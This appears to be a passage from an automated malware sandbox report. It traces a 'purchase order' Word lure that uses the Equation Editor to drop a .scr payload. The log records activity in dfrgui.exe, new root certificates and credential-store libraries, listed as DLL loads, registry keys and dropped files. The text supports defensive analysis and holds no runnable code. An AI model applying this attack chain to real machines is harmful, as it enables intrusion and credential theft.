            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: bcrypt.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrSection loaded: bcrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: virtdisk.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: fltlib.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: sxshared.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: mozglue.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: wdscore.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: cryptui.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: riched32.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: MOQ010524Purchase order.LNK.0.drLNK file: ..\..\..\..\..\Desktop\MOQ010524Purchase order.doc
            Source: C:\Windows\SysWOW64\dfrgui.exeFile opened: C:\Windows\SysWOW64\RichEd32.dllJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\AppData\Roaming\op55336.scrFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: op55336.scr, 00000005.00000002.351721062.0000000002491000.00000004.00000800.00020000.00000000.sdmp, op55336.scr, 00000005.00000002.351512154.00000000003B0000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dfrgui.pdb source: eDTvjJMLUGCaWhgZ.exe, 00000007.00000003.395166621.0000000001C60000.00000004.00000001.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 00000007.00000003.395327536.0000000001E30000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eDTvjJMLUGCaWhgZ.exe, 00000007.00000002.847158763.00000000001FE000.00000002.00000001.01000000.00000008.sdmp, eDTvjJMLUGCaWhgZ.exe, 0000000C.00000002.847139863.00000000001FE000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: dfrgui.pdb2D source: eDTvjJMLUGCaWhgZ.exe, 00000007.00000003.395166621.0000000001C60000.00000004.00000001.00020000.00000000.sdmp, eDTvjJMLUGCaWhgZ.exe, 00000007.00000003.395327536.0000000001E30000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: op55336.scr, op55336.scr, 00000006.00000002.415689767.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847379947.0000000002170000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.847379947.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000003.410885708.0000000001E80000.00000004.00000020.00020000.00000000.sdmp
            Source: opp[1].scr.2.drStatic PE information: 0xCA00A32F [Sun May 23 23:50:07 2077 UTC]
            Source: sqlite3.dll.8.drStatic PE information: section name: /4
            Source: sqlite3.dll.8.drStatic PE information: section name: /19
            Source: sqlite3.dll.8.drStatic PE information: section name: /31
            Source: sqlite3.dll.8.drStatic PE information: section name: /45
            Source: sqlite3.dll.8.drStatic PE information: section name: /57
            Source: sqlite3.dll.8.drStatic PE information: section name: /70
            Source: sqlite3.dll.8.drStatic PE information: section name: /81
            Source: sqlite3.dll.8.drStatic PE information: section name: /92
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00678F60 push eax; retf 2_2_00678F61
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00680F60 push eax; retn 0067h2_2_00680F61
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00673B44 push eax; retf 0068h2_2_00673B45
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00688018 push esi; ret 2_2_006889AB
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_006701F4 push eax; retf 2_2_006701F5
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0066F8B8 pushfd ; retf 2_2_0066F8B9
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0041B855 pushad ; iretd 6_2_0041B884
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00407936 push eax; iretd 6_2_00407937
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_004191E7 push ecx; ret 6_2_004191E8
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00415A7A push esi; retf 6_2_00415AB4
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0040EB41 push 7B0B5DBBh; iretd 6_2_0040EB4A
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0042F3B2 push eax; ret 6_2_0042F3B4
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00419C00 pushad ; retf 6_2_00419C2D
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00415C3E push esp; retf 6_2_00415C8E
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00403640 push eax; ret 6_2_00403642
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_0041F75D push eax; iretd 6_2_0041F75E
            Source: C:\Users\user\AppData\Roaming\op55336.scrCode function: 6_2_00EADFA1 push ecx; ret 6_2_00EADFB4
            Source: opp[1].scr.2.drStatic PE information: section name: .text entropy: 7.646009016115731
            Source: op55336.scr.2.drStatic PE information: section name: .text entropy: 7.646009016115731

            Persistence and Installation Behavior

            barindex
            Drops PE files with a suspicious file extension
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\opp[1].scrJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\op55336.scrJump to dropped file
            Installs new ROOT certificates
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeFile created: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\opp[1].scrJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\op55336.scrJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\op55336.scrProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
